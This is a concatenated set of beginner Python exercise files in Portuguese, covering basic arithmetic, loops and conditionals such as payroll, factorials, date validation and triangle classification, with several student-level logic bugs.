"is_vendor": false, "language": "Python", "length_bytes": 1261, "license_type": "no_license", "max_line_length": 319, "num_lines": 35, "path": "/Ex 030.py", "repo_name": "0xJinbe/Exercicios-py", "src_encoding": "UTF-8", "text": "\"\"\"Faça um programa que faça 5 perguntas para uma pessoa sobre um crime. As perguntas são:\n\"Telefonou para a vítima?\"\n\"Esteve no local do crime?\"\n\"Mora perto da vítima?\"\n\"Devia para a vítima?\"\n\"Já trabalhou com a vítima?\" O programa deve no final emitir uma classificação sobre a participação da pessoa no crime. Se a pessoa responder positivamente a 2 questões ela deve ser classificada como \"Suspeita\", entre 3 e 4 como \"Cúmplice\" e 5 como \"Assassino\". Caso contrário, ele será classificado como \"Inocente\".\"\"\"\n\nprint('Programa classificação criminal')\np1 = input('Telefonou para a vítima? (s/n): ')\np2 = input('Esteve no local do crime? (s/n): ')\np3 = input('Mora perto da vítima? (s/n): ')\np4 = input('Devia para a vitima? (s/n): ')\np5 = input('Já trabalhou com a vítima? (s/n): ')\nlista = []\nlista.append(p1)\nlista.append(p2)\nlista.append(p3)\nlista.append(p4)\nlista.append(p5)\ncount_s = 0\ncount_n = 0\nfor i in lista:\n if i == 's':\n count_s = count_s + 1\n else:\n count_n = count_n + 1\n\nif count_s == 2:\n print('classificação = \"suspeita\"')\nelif count_s == 3 or count_s == 4:\n print('classificação = \"Cúmlice\"')\nelif count_s == 5:\n print('classificação = \"Assassino\"')\nelse:\n print('Inocente...')\n" }, { "alpha_fraction": 0.6360656023025513, "alphanum_fraction": 0.66557377576828, "avg_line_length": 49.83333206176758, "blob_id": "c7b41fd59d15cc32d0660e45490ed3b6ebbbd224", "content_id": "845ad445c0d5b3ad4714f09e0bd84e3190f24409", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 311, "license_type": "no_license", "max_line_length": 168, "num_lines": 6, "path": "/Ex 034.py", "repo_name": "0xJinbe/Exercicios-py", "src_encoding": "UTF-8", "text": "\"\"\"Faça um programa que peça uma nota, entre zero e dez. Mostre uma mensagem caso o valor seja inválido e continue pedindo até que o usuário informe um valor válido.\"\"\"\n\nnt = int(input('Entre com uma nota (0 a 10): '))\n\nwhile (nt > 0) and (nt < 10):\n nt = int(input('Entre com uma nota (0 a 10): '))\n" }, { "alpha_fraction": 0.5562770366668701, "alphanum_fraction": 0.6028138399124146, "avg_line_length": 33.25925827026367, "blob_id": "0aed359f5094058dae6b60156c0a0a3a43e06f93", "content_id": "82bf0bd7a66401615746ec74b90525c3eae81d03", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 932, "license_type": "no_license", "max_line_length": 296, "num_lines": 27, "path": "/Ex 032.py", "repo_name": "0xJinbe/Exercicios-py", "src_encoding": "UTF-8", "text": "\"\"\"Uma fruteira está vendendo frutas com a seguinte tabela de preços:\n Até 5 Kg Acima de 5 Kg\nMorango R$ 2,50 por Kg R$ 2,20 por Kg\nMaçã R$ 1,80 por Kg R$ 1,50 por Kg\nSe o cliente comprar mais de 8 Kg em frutas ou o valor total da compra ultrapassar R$ 25,00, receberá ainda um desconto de 10% sobre este total. Escreva um algoritmo para ler a quantidade (em Kg) de morangos e a quantidade (em Kg) de maças adquiridas e escreva o valor a ser pago pelo cliente.\"\"\"\n\n\nqt_mo = float(input('Quantos kgs de morango? '))\nqt_ma = float(input('Quantos kgs de maça? '))\np_mo = 0\np_ma = 0\nif qt_mo < 5:\n p_mo = qt_mo * 2.50\nelse:\n p_mo = qt_mo * 2.20\n\nif qt_ma < 5:\n p_ma = qt_ma * 1.80\nelse:\n p_ma = qt_ma * 1.50\np_geral = p_mo + p_ma\n\n\nif qt_mo + qt_ma >= 8 or p_geral > 25:\n p_geral = p_geral - (p_geral*0.10)\n\nprint('Valor a ser pago: ', p_geral)" }, { "alpha_fraction": 0.5745097994804382, "alphanum_fraction": 0.6235294342041016, "avg_line_length": 24.947368621826172, "blob_id": "dc4938e35b61e34a0fb303cd588a3b8b910cf7da", "content_id": "015aba6b3b14acf2e8b5df8f38aa967e80fc26f4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 514, "license_type": "no_license", "max_line_length": 154, "num_lines": 19, "path": "/Ex 062.py", "repo_name": "0xJinbe/Exercicios-py", "src_encoding": "UTF-8", "text": "\"\"\"Faça um programa que calcule o fatorial de um número inteiro fornecido pelo usuário. Ex.: 5!=5.4.3.2.1=120. A saída deve ser conforme o exemplo abaixo:\r\nFatorial de: 5\r\n5! = 5 . 4 . 3 . 2 . 1 = 120\"\"\"\r\n\r\nn = int(input('Entre com um numero para ser fatorado: '))\r\n\r\nresultado = 1\r\ncount = 1\r\n\r\nwhile count <= n:\r\n resultado *= count\r\n count += 1\r\nprint(resultado)\r\n\"\"\"\r\nnumero = int(input('Entre com o numero: '))\r\nresultado = 1\r\nfor n in range (1, numero + 1):\r\n resultado *= \r\nprint(resultado)\"\"\"" }, { "alpha_fraction": 0.6276150345802307, "alphanum_fraction": 0.6527196764945984, "avg_line_length": 22.799999237060547, "blob_id": "10ca49507e429bf6330adcb63e90d40a85638a99", "content_id": "df5ad5ee30818ac9f235aabc9b610133e8798c74", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 242, "license_type": "no_license", "max_line_length": 66, "num_lines": 10, "path": "/Ex 006.py", "repo_name": "0xJinbe/Exercicios-py", "src_encoding": "UTF-8", "text": "\"\"\"Faça um Programa que peça dois números e imprima o maior deles.\n\"\"\"\n\nnum_1 = float(input('Entre com o primeiro numero: '))\nnum_2 = float(input('Entre com o segundo numero: '))\n\nif num_1 > num_2:\n print(num_1)\nelse:\n print(num_2)\n\n" }, { "alpha_fraction": 0.607594907283783, "alphanum_fraction": 0.6126582026481628, "avg_line_length": 22.294116973876953, "blob_id": "ce5c902505fbdefeb74624aad2804d8c68376f54", "content_id": "85df86d7cd11762366ac89410097d2fdb9943f55", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 397, "license_type": "no_license", "max_line_length": 119, "num_lines": 17, "path": "/Ex 049.py", "repo_name": "0xJinbe/Exercicios-py", "src_encoding": "UTF-8", "text": "\"\"\"Faça um programa que, dado um conjunto de N números, determine o menor valor, o maior valor e a soma dos valores.\"\"\"\n\nsoma = 0\ncondition = True\nnumero = []\n\nwhile condition:\n n = int(input('Informe um numero: '))\n if n != 0:\n soma += n\n numero.append(n)\n else:\n break\n\nprint('Soma: ', soma)\nprint('Menor valor: ', min(numero))\nprint('Mairo valor: ', max(numero))" }, { "alpha_fraction": 0.6521739363670349, "alphanum_fraction": 0.6608695387840271, "avg_line_length": 27.875, "blob_id": "c8670e0bf98f7db5cdac7f7a8172b4df24f3ae0e", "content_id": "8ae773bbd79ef580a6ee4767d1363cf329012736", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 235, "license_type": "no_license", "max_line_length": 111, "num_lines": 8, "path": "/Ex 028.py", "repo_name": "0xJinbe/Exercicios-py", "src_encoding": "UTF-8", "text": "\"\"\"Faça um programa que peça um numero inteiro e determine se ele é par ou impar. Utilize operador de modulo\"\"\"\n\nnum = int(input('Entre com o numero: '))\n\nif num % 2 == 0:\n print('Numero par')\nelse:\n print('Número ímpar...')" }, { "alpha_fraction": 0.7131258249282837, "alphanum_fraction": 0.7307171821594238, "avg_line_length": 45.25, "blob_id": "6bee0f8b6331a842fc49b92c8cc3b39eaf684e6b", "content_id": "9b42fb78dcf148ed8c256f69c1c709a687e4e2f8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 755, "license_type": "no_license", "max_line_length": 283, "num_lines": 16, "path": "/Ex 002.py", "repo_name": "0xJinbe/Exercicios-py", "src_encoding": "UTF-8", "text": "\"\"\"Faça um Programa que pergunte quanto você ganha por hora e o número de horas trabalhadas no mês. Calcule e mostre o total do seu salário no referido mês, sabendo-se que são descontados 11% para o Imposto de Renda, 8% para o INSS e 5% para o sindicato, faça um programa que nos dê:\nsalário bruto.\nquanto pagou ao INSS.\nquanto pagou ao sindicato.\no salário líquido.\"\"\"\n\nganho_hr = float(input('Quanto se ganha por hora? '))\nqt_hrs = float(input('Quantas horas sao trabalhadas por mẽs? '))\n\nbruto = ganho_hr*qt_hrs\nprint(bruto)\nir = (bruto*0.11)\ninss = (bruto*0.08)\nsindicato = (bruto*0.05)\nliquido = bruto-ir-inss-sindicato\nprint('Seu sal bruto é: ', bruto, 'Descontos: IR-INSS-sindicato:', ir,inss,sindicato, 'Sal liquido é: ', liquido )" }, { "alpha_fraction": 0.5182679295539856, "alphanum_fraction": 0.5683355927467346, "avg_line_length": 26.407407760620117, "blob_id": "74ab93afa8fe5cb449179f5fffec5f417ea72b24", "content_id": "ef08f7a16447aae24c75519a1141e163c80900c9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 745, "license_type": "no_license", "max_line_length": 104, "num_lines": 27, "path": "/Ex 023.py", "repo_name": "0xJinbe/Exercicios-py", "src_encoding": "UTF-8", "text": "\"\"\"Faça um Programa que peça uma data no formato dd/mm/aaaa e determine se a mesma é uma data válida.\"\"\"\n\nvalida = False\n\ndia = int(input('Entre com uma dia: '))\nmes = int(input('Entre com uma mes: '))\nano = int(input('Entre com uma dia: '))\n\n#mes com 31 dias\nif ( mes == 1 or mes == 3 or mes ==5 or mes == 7 or mes == 8 or mes == 10 or mes ==12):\n if(dia<=31):\n valida = True\n#meses com 30 dias\nelif ( mes==4 or mes==6 or mes==9 or mes==11):\n if(dia<=30):\n valida = True\nelif mes==2:\n #testa se e bissexto\n if (ano%4==0 and ano%100!=0) or (ano%400==0):\n if(dia<=29):\n valida = True\n elif(dia<=28):\n valida = True\nif (valida):\n print('Data válida...')\nelse:\n print('Inválida...')" }, { "alpha_fraction": 0.5563725233078003, "alphanum_fraction": 0.5686274766921997, "avg_line_length": 20.526315689086914, "blob_id": "6734d25a36b656fea9923b2f73deb3348ee77a1d", "content_id": "6221f7c7cee16134dab59beeca6eccca2470a778", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 412, "license_type": "no_license", "max_line_length": 78, "num_lines": 19, "path": "/Ex 041.py", "repo_name": "0xJinbe/Exercicios-py", "src_encoding": "UTF-8", "text": "\"\"\"Faça um programa que leia 5 números e informe a soma e a média dos números.\n\"\"\"\nlista = []\ni = 1\nwhile i <= 5:\n a = int(input('Informe os numeros: '))\n lista.append(a)\n media = sum(lista)/len(lista)\n soma = sum(lista)\n i += 1\nprint(lista, soma, media)\n\nl = []\nfor i in range (5):\n a = int(input('Informe os valores: '))\n l.append(a)\n m = sum(l)/len(l)\n s = sum(l)\nprint(l, s, m)" }, { "alpha_fraction": 0.6204819083213806, "alphanum_fraction": 0.6666666865348816, "avg_line_length": 30.1875, "blob_id": "a866d8030c5b99f2a2799a35fec44dbd3b26c685", "content_id": "9ca5aefe16041b49bcc26798d7f69c3fd7900bfc", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 509, "license_type": "no_license", "max_line_length": 151, "num_lines": 16, "path": "/Ex 013.py", "repo_name": "0xJinbe/Exercicios-py", "src_encoding": "UTF-8", "text": "\"\"\"Faça um programa que pergunte o preço de três produtos e informe qual produto você deve comprar, sabendo que a decisão é sempre pelo mais barato.\"\"\"\n\nprint('Entre com o preço dos 3 produtos que deseja comprar')\n\np1= float(input('Preço 1: '))\np2 = float(input('Preço 2: '))\np3 = float(input('Preço 3: '))\n\nmais_barato = 0\nif p1 < p2 and p1 < p3:\n mais_barato = p1\nif p2 < p1 and p2 < p3:\n mais_barato = p2\nif p3 < p1 and p3 < p2:\n mais_barato = p3\nprint('O mais barato é: ', mais_barato)" }, { "alpha_fraction": 0.7274881601333618, "alphanum_fraction": 0.7322275042533875, "avg_line_length": 59.28571319580078, "blob_id": "1869a27380957f34bb50aa3e7ead652d2c5c29af", "content_id": "4fa307ef7179878b878c9e3ace6bc260ab974b85", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 424, "license_type": "no_license", "max_line_length": 214, "num_lines": 7, "path": "/Ex 005.py", "repo_name": "0xJinbe/Exercicios-py", "src_encoding": "UTF-8", "text": "\"\"\"Faça um programa que peça o tamanho de um arquivo para download (em MB) e a velocidade de um link de Internet (em Mbps), calcule e informe o tempo aproximado de download do arquivo usando este link (em minutos).\n\"\"\"\n\narquivo = float(input('Qual o tamanho do arquivo para dowload(mb): '))\ninternet = float(input('Qual a velocidade da internet? '))\n\nprint('Tempo aproximado de donwload(min): ', ((arquivo/internet)*60 ))\n" }, { "alpha_fraction": 0.6125116944313049, "alphanum_fraction": 0.6255835890769958, "avg_line_length": 28.657142639160156, "blob_id": "94c0edc992bb22f2dd612d695fd706d91cb145ad", "content_id": "b289b4b9d013d1206273f37ed316c996728cf895", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1078, "license_type": "no_license", "max_line_length": 194, "num_lines": 35, "path": "/Ex 058.py", "repo_name": "0xJinbe/Exercicios-py", "src_encoding": "UTF-8", "text": "\"\"\"Faça um programa que calcule o número médio de alunos por turma. Para isto, peça a quantidade de turmas e a quantidade de alunos para cada turma. As turmas não podem ter mais de 40 alunos.\"\"\"\r\n\r\nturmas = int(input('Entre com a quantidade de turmas: '))\r\nlista = []\r\ncount = 0\r\n\r\nwhile count < turmas:\r\n alunos = int(input('Quantidade de alunos: '))\r\n count += 1\r\n if alunos < 40:\r\n lista.append(alunos)\r\n else:\r\n print('A quantidade de alunos por turma deve ser menor que 40...')\r\n\r\nmedia = sum(lista)/len(lista)\r\nprint(f\"A media dos alunos é de: {media}\")\r\n\r\n\r\n\r\n\r\n\"\"\"\r\nturmas = int(input('Digite a quantidade de turmas: '))\r\nalunos_turmas = []\r\nturma = 1\r\n\r\nfor i in range(turmas):\r\n print(f\"turma, {turma}\")\r\n alunos = int(input('Alunos da turma: '))\r\n while alunos > 40:\r\n print('turma ', turma, \" [ uma turma so pode ter 40 alunos ]\")\r\n alunos = int(input('Alunos da turma: '))\r\n turma += 1\r\n alunos_turmas.append(alunos)\r\nmedia = sum(alunos_turmas)/len(alunos_turmas)\r\nprint('A media é igual a: ', media)\"\"\"" }, { "alpha_fraction": 0.6373626589775085, "alphanum_fraction": 0.6556776762008667, "avg_line_length": 44.33333206176758, "blob_id": "0433d57e78751a819bb1317b4c4b4a6f144c9055", "content_id": "bde82b0680f2f2c545666a0182fc94b5c275b520", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 275, "license_type": "no_license", "max_line_length": 169, "num_lines": 6, "path": "/Ex 044.py", "repo_name": "0xJinbe/Exercicios-py", "src_encoding": "UTF-8", "text": "\"\"\"Desenvolva um gerador de tabuada, capaz de gerar a tabuada de qualquer número inteiro entre 1 a 10. O usuário deve informar de qual numero ele deseja ver a tabuada\"\"\"\n\ntb = int(input('Tabuada de: '))\nfor n in range (11):\n a = f\"{tb} x {n} = {(n * tb)}\"\n print(a)\n\n" }, { "alpha_fraction": 0.6896551847457886, "alphanum_fraction": 0.6896551847457886, "avg_line_length": 49.77777862548828, "blob_id": "b9e5ec2aa351ca9f2fbdb299f5fd94615dc6e247", "content_id": "a51c3478f5d2085d3503e5390c5212fa6ac3a118", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 475, "license_type": "no_license", "max_line_length": 213, "num_lines": 9, "path": "/Ex 059.py", "repo_name": "0xJinbe/Exercicios-py", "src_encoding": "UTF-8", "text": "\"\"\"Faça um programa que calcule o valor total investido por um colecionador em sua coleção de CDs e o valor médio gasto em cada um deles. O usuário deverá informar a quantidade de CDs e o valor para em cada um.\"\"\"\r\n\r\ncds = int(input('Qual a quantidade de cds da coleção? '))\r\nlist = []\r\n\r\nfor i in range(cds):\r\n vlr = int(input('Qual o valor de cada cd? '))\r\n list.append(vlr)\r\nprint(f\"A media do valor gasto por cd na coleção é de: {(sum(list)/len(list))}\")" }, { "alpha_fraction": 0.6606523394584656, "alphanum_fraction": 0.7078417539596558, "avg_line_length": 36.94736862182617, "blob_id": "1ccc55f6ccb8ee55b6f25d7a93f85adc24694f6a", "content_id": "5ddaacd84c545559aa2de4cf4c51383e72b421e6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1466, "license_type": "no_license", "max_line_length": 451, "num_lines": 38, "path": "/Ex 017.py", "repo_name": "0xJinbe/Exercicios-py", "src_encoding": "UTF-8", "text": "\"\"\"Faça um programa para o cálculo de uma folha de pagamento, sabendo que os descontos são do Imposto de Renda, que depende do salário bruto (conforme tabela abaixo) e 3% para o Sindicato e que o FGTS corresponde a 11% do Salário Bruto, mas não é descontado (é a empresa que deposita). O Salário Líquido corresponde ao Salário Bruto menos os descontos. O programa deverá pedir ao usuário o valor da sua hora e a quantidade de horas trabalhadas no mês.\nDesconto do IR:\nSalário Bruto até 900 (inclusive) - isento\nSalário Bruto até 1500 (inclusive) - desconto de 5%\nSalário Bruto até 2500 (inclusive) - desconto de 10%\nSalário Bruto acima de 2500 - desconto de 20% Imprima na tela as informações, dispostas conforme o exemplo abaixo. No exemplo o valor da hora é 5 e a quantidade de hora é 220.\"\"\"\n\n\nhr = float(input('Qual o valor das horas trabalhadas? '))\nqtn = float(input('Qual a quantidade de horas trabalhadas? '))\n\nbruto = hr * qtn\nprint('Bruto: ', bruto)\n\nfgts = (bruto*11)/100\nprint('FGTS: ', fgts)\n\ninss = (bruto*10)/100\nprint('INSS: ', inss)\n\nsindicato = (bruto*3)/100\nprint('Sindicato: ', sindicato)\n\nir = 0\nif bruto <= 900:\n ir = 0\nelif bruto <= 1500:\n ir = (5*bruto)/100\nelif bruto <= 2500:\n ir = (10*bruto)/100\nelse:\n ir = (20*bruto)/100\n\n\ndescontos = ir + inss\nliquido = bruto - descontos\n\nprint('Salario bruto: ', bruto,'IR: ', ir, 'INSS: ', inss,'FGTS: ', fgts,'Descontos: ', descontos,'Total liquido: ', liquido)" }, { "alpha_fraction": 0.6706587076187134, "alphanum_fraction": 0.6898203492164612, "avg_line_length": 36.90909194946289, "blob_id": "313a02efa741682300ad064ba4f16072dfeb4b10", "content_id": "7f3a2329c15e50aec2fc7f34383049902ae78aa3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 858, "license_type": "no_license", "max_line_length": 214, "num_lines": 22, "path": "/Ex 020.py", "repo_name": "0xJinbe/Exercicios-py", "src_encoding": "UTF-8", "text": "\"\"\"Faça um Programa que peça os 3 lados de um triângulo. O programa deverá informar se os valores podem ser um triângulo. Indique, caso os lados formem um triângulo, se o mesmo é: equilátero, isósceles ou escaleno.\nDicas:\nTrês lados formam um triângulo quando a soma de quaisquer dois lados for maior que o terceiro;\nTriângulo Equilátero: três lados iguais;\nTriângulo Isósceles: quaisquer dois lados iguais;\nTriângulo Escaleno: três lados diferentes;\"\"\"\n\nl1 = float(input('Lado um do triangulo: '))\nl2 = float(input('Lado dois do triangulo: '))\nl3 = float(input('Lado tres do triangulo: '))\n\nif l1 + l2 >= l3:\n print('É um triangulo')\n if l1 == l2 == l3:\n print('Equilátero')\n elif l1 == l2 or l2 == l3 or l1 == l3:\n print('Isósceles')\n else:\n print('Escaleno')\n\nelse:\n print('Não é um triangulo')\n\n" }, { "alpha_fraction": 0.7079566121101379, "alphanum_fraction": 0.7305606007575989, "avg_line_length": 56.31578826904297, "blob_id": "931790f8eb4d21290c990e84f00d8e51fe172d7c", "content_id": "c0572e2cb4b66ab5d6f4e3616152186fe5b838e7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1124, "license_type": "no_license", "max_line_length": 648, "num_lines": 19, "path": "/Ex 061.py", "repo_name": "0xJinbe/Exercicios-py", "src_encoding": "UTF-8", "text": "\"\"\"O Sr. Manoel Joaquim expandiu seus negócios para além dos negócios de 1,99 e agora possui uma loja de conveniências. Faça um programa que implemente uma caixa registradora rudimentar. O programa deverá receber um número desconhecido de valores referentes aos preços das mercadorias. Um valor zero deve ser informado pelo operador para indicar o final da compra. O programa deve então mostrar o total da compra e perguntar o valor em dinheiro que o cliente forneceu, para então calcular e mostrar o valor do troco. Após esta operação, o programa deverá voltar ao ponto inicial, para registrar a próxima compra. A saída deve ser conforme o exemplo abaixo:\r\nLojas Tabajara\r\nProduto 1: R$ 2.20\r\nProduto 2: R$ 5.80\r\nProduto 3: R$ 0\r\nTotal: R$ 9.00\r\nDinheiro: R$ 20.00\r\nTroco: R$ 11.00\r\n...\"\"\"\r\n\r\nproduto = float(input('Entre com o preço: '))\r\nlista = []\r\nwhile produto !=0 :\r\n produto = float(input('Entre com o preço: '))\r\n lista.append(produto)\r\nsoma = sum(lista)\r\ndinheiro = float(input('Qual o valor do pagamento? '))\r\n\r\nprint(f\"LOJAS TABAJARA \\n Total: {soma} \\n Dinheiro: {dinheiro} \\n Troco: {(dinheiro-soma)}\")" }, { "alpha_fraction": 0.7145708799362183, "alphanum_fraction": 0.7145708799362183, "avg_line_length": 48.29999923706055, "blob_id": "f8d9b5695763e561bf87c0908a742e99869a0563", "content_id": "bf25a00068eaddbf4aacb898d3b0e36c86f4591a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 502, "license_type": "no_license", "max_line_length": 240, "num_lines": 10, "path": "/Ex 063.py", "repo_name": "0xJinbe/Exercicios-py", "src_encoding": "UTF-8", "text": "\"\"\"O Departamento Estadual de Meteorologia lhe contratou para desenvolver um programa que leia as um conjunto indeterminado de temperaturas, e informe ao final a menor e a maior temperaturas informadas, bem como a média das temperaturas.\"\"\"\r\n\r\n\r\nn_temp = int(input('Qual a quantidade de temperaturas? '))\r\ntemp = []\r\n\r\nfor i in range (n_temp):\r\n temperatura = temp.append(float(input('Entre com a temperatura: ')))\r\n \r\nprint(f\"Maior: {max(temp)} Menor: {min(temp)} Media: {sum(temp)/len(temp)}\")" }, { "alpha_fraction": 0.6029962301254272, "alphanum_fraction": 0.6254681944847107, "avg_line_length": 32.3125, "blob_id": "b1b82fc5997a4c863cd0de185d1eca55458d91bb", "content_id": "3839ff245f1d3fb89c2b85aa8f7e5fa6d649d939", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 539, "license_type": "no_license", "max_line_length": 131, "num_lines": 16, "path": "/Ex 046.py", "repo_name": "0xJinbe/Exercicios-py", "src_encoding": "UTF-8", "text": "\"\"\"Faça um programa que peça 10 números inteiros, calcule e mostre a quantidade de números pares e a quantidade de números impares.\n\"\"\"\n\nlista_par = []\nlista_impar = []\ncount_par = 0\ncount_impar = 0\nfor i in range (10):\n n = int(input('Entre com os numeros: '))\n if n % 2 == 0:\n count_par += 1\n lista_par.append(n)\n elif n % 2 != 0:\n count_impar += 1\n lista_impar.append(n)\nprint(f\"Lista impar: {lista_impar} quantidade impar: {count_impar}, lista par: {lista_par}, quantidade par: {count_par}\")\n\n" }, { "alpha_fraction": 0.6697965860366821, "alphanum_fraction": 0.693270742893219, "avg_line_length": 39, "blob_id": "d3379c4e3a7e371830181a9c671d33b77048399e", "content_id": "0b6863d04e035bba4c80312897967cea7367ba8c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 652, "license_type": "no_license", "max_line_length": 134, "num_lines": 16, "path": "/Ex 025.py", "repo_name": "0xJinbe/Exercicios-py", "src_encoding": "UTF-8", "text": "\"\"\"Faça um Programa para leitura de três notas parciais de um aluno. O programa deve calcular a média alcançada por aluno e presentar:\nA mensagem \"Aprovado\", se a média for maior ou igual a 7, com a respectiva média alcançada;\nA mensagem \"Reprovado\", se a média for menor do que 7, com a respectiva média alcançada;\nA mensagem \"Aprovado com Distinção\", se a média for igual a 10.\"\"\"\n\nnt_1 = int(input('Entre com valor trimestre 1: '))\nnt_2 = int(input('Entre com o valor trimesre 2: '))\nnt_3 = int(input('Entre om o valor trimestre 3: '))\n\ntt = nt_1 + nt_2 + nt_3\nmm = tt / 3\nprint(mm)\nif mm >= 7:\n print('Apr.')\nelse:\n print('Rep.')" }, { "alpha_fraction": 0.6169666051864624, "alphanum_fraction": 0.6272493600845337, "avg_line_length": 30.25, "blob_id": "7c1038a8db99d96fbb4a35323a8f5a2e27d4c8d4", "content_id": "11a3968667f8ae15529a45252b21f8ced609e7fe", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 793, "license_type": "no_license", "max_line_length": 183, "num_lines": 24, "path": "/Ex 057.py", "repo_name": "0xJinbe/Exercicios-py", "src_encoding": "UTF-8", "text": "\"\"\"Numa eleição existem três candidatos. Faça um programa que peça o número total de eleitores. Peça para cada eleitor votar e ao final mostrar o número de votos de cada candidato.\"\"\"\r\n\r\nn_eleitores = int(input('Qual o numero total de eleitores? '))\r\nl_candidatos = []\r\n\r\ncount_A = 0\r\ncount_B = 0\r\ncount_C = 0\r\nn_repetições = 0\r\nwhile n_repetições < n_eleitores:\r\n voto = (input('Qual candidato deseja votar? A,B,C: ')).upper()\r\n l_candidatos.append(voto)\r\n n_repetições += 1\r\nprint(l_candidatos)\r\n\r\nfor i in l_candidatos:\r\n if i == 'A':\r\n count_A += 1\r\n elif i == 'B':\r\n count_B += 1\r\n else:\r\n count_C += 1\r\n\r\nprint(f\"A quantidade de pessoas que votou no candidato A é de: {count_A}. Candidato B: {count_B}. Candidato C: {count_C}\")\r\n\r\n\r\n" }, { "alpha_fraction": 0.6590105891227722, "alphanum_fraction": 0.6696113348007202, "avg_line_length": 33.375, "blob_id": "03d270ce9e971e518c0124263254f2b3b176b005", "content_id": "9a17b23c61c6a6b7cb3a9a482558d76c8445a0ef", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 585, "license_type": "no_license", "max_line_length": 260, "num_lines": 16, "path": "/Ex 064.py", "repo_name": "0xJinbe/Exercicios-py", "src_encoding": "UTF-8", "text": "\"\"\"Os números primos possuem várias aplicações dentro da Computação, por exemplo na Criptografia. Um número primo é aquele que é divisível apenas por um e por ele mesmo. Faça um programa que peça um número inteiro e determine se ele é ou não um número primo\"\"\"\r\n\r\nn = int(input(\"Verificar numeros primos ate: \"))\r\nmult=0\r\n\r\nfor count in range(2,n):\r\n if (n % count == 0):\r\n print(\"Múltiplo de\",count)\r\n mult += 1\r\n\r\nif(mult==0):\r\n print(\"É primo\")\r\nelse:\r\n print(\"Tem\",mult,\" múltiplos acima de 2 e abaixo de\",n)\r\n\r\n#Exercicios wikioyhton br\r\n" }, { "alpha_fraction": 0.6286764740943909, "alphanum_fraction": 0.6654411554336548, "avg_line_length": 29.11111068725586, "blob_id": "b77b2a7f4714c26801f42ca6ec9835d283cbc2f3", "content_id": "bff4c4de0bf0f61f5da62f028bb538e937df6b93", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 277, "license_type": "no_license", "max_line_length": 126, "num_lines": 9, "path": "/Ex 022.py", "repo_name": "0xJinbe/Exercicios-py", "src_encoding": "UTF-8", "text": "\"\"\"Faça um Programa que peça um número correspondente a um determinado ano e em seguida informe se este ano é ou não bissexto.\n\"\"\"\n\nano = int(input('Entre com o ano: '))\n\nif (ano%4==0 and ano%100!=0) or (ano%400==0):\n print('Bissexto')\nelse:\n print('N e bissexto')\n\n" }, { "alpha_fraction": 0.6691480278968811, "alphanum_fraction": 0.6823821067810059, "avg_line_length": 42.21428680419922, "blob_id": "7626ba157020a6e67630d783a958221ad18ace0d", "content_id": "e367b5ed22a17dd93008cb20364fca67a3782b40", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1241, "license_type": "no_license", "max_line_length": 216, "num_lines": 28, "path": "/Ex 021.py", "repo_name": "0xJinbe/Exercicios-py", "src_encoding": "UTF-8", "text": "\"\"\"Faça um programa que calcule as raízes de uma equação do segundo grau, na forma ax2 + bx + c. O programa deverá pedir os valores de a, b e c e fazer as consistências, informando ao usuário nas seguintes situações:\nSe o usuário informar o valor de A igual a zero, a equação não é do segundo grau e o programa não deve fazer pedir os demais valores, sendo encerrado;\nSe o delta calculado for negativo, a equação não possui raizes reais. Informe ao usuário e encerre o programa;\nSe o delta calculado for igual a zero a equação possui apenas uma raiz real; informe-a ao usuário;\nSe o delta for positivo, a equação possui duas raiz reais; informe-as ao usuário;\"\"\"\n\nimport math\n\nprint('Programa que acha as raizes de ax2 + bx + c = 0')\n\na = int(input('Coeficiente a: '))\n\nif (a==0):\n print('A == 0. A equação não é do segundo grau')\nelse:\n b = int(input('Coeficiente b: '))\n c = int(input('Coeficiente c: '))\n delta = b*b - 4*a*c\n\nif delta < 0:\n print('Delta menor que zero, raízes imaginárias.')\nelif delta == 0:\n raiz = -b/(2*a)\n print('Delta=0 , raiz = ', raiz)\nelse:\n raiz1 = (-b + math.sqrt(delta)) / 2*a\n raiz2 = (-b - math.sqrt(delta)) / 2*a\n print('Raízes: ', raiz1, raiz2)" }, { "alpha_fraction": 0.582172691822052, "alphanum_fraction": 0.6350975036621094, "avg_line_length": 21.5, "blob_id": "ee76576f9c3a76d30de19f309945ab78f5c58ecb", "content_id": "d354570f387ca4780c337c55e53e078f70c4cc6d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 363, "license_type": "no_license", "max_line_length": 109, "num_lines": 16, "path": "/Ex 050.py", "repo_name": "0xJinbe/Exercicios-py", "src_encoding": "UTF-8", "text": "\"\"\"Faça um programa que calcule o fatorial de um número inteiro fornecido pelo usuário. Ex.: 5!=5.4.3.2.1=120\n\"\"\"\n\n\"\"\"f=lambda x :x if x<=2 else x*f(x-1)\n\nprint(f(5))\"\"\"\n\nnumero = 